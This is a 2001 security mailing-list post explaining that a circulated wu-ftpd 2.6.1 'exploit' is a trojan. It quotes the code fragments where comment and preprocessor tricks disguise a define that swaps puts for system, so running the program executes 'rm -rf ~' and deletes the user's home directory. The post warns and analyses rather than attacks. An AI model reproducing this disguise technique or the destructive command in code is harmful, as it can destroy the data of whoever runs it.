Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re[2]: wuftpd 2.6.1 advisory/exploit

From: Alexander Ryumshin <mizi () alkar net>
Date: Thu, 20 Sep 2001 15:55:14 +0300
Hello,

Yes, the trick is here:

//#define POTS 12                       /* fill these in for your
#define DEF_ALGN 1                       * target system  
//#define HEAP_ADDR 0x41414141           */ 
...
#define target (unsigned long)
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,

After preprocessing the code looks like

unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

Then puts' address is being replaced by system's or something like
that and then puts("rm -rf is not elite ~"); does the main trick :)
Hint: ~ means your home directory.


Wednesday, September 19, 2001, 6:38:14 PM, you wrote:

BB> Hey, I'm told that this exploit like eats your hard drive or something.
BB> Caveat emptor and all, but I figured since I actually heard about this,
BB> I'd let you know.  I guess it's a spoofed note.

BB>                                         BB


--
Best regards,
Alexander
ISP Alkar Teleport
tel/fax +380 562 340044
mailto:mizi () alkar net
http://abn.com.ua
http://ufa.com.ua
Previous By Date Next
Previous By Thread Next

Current thread: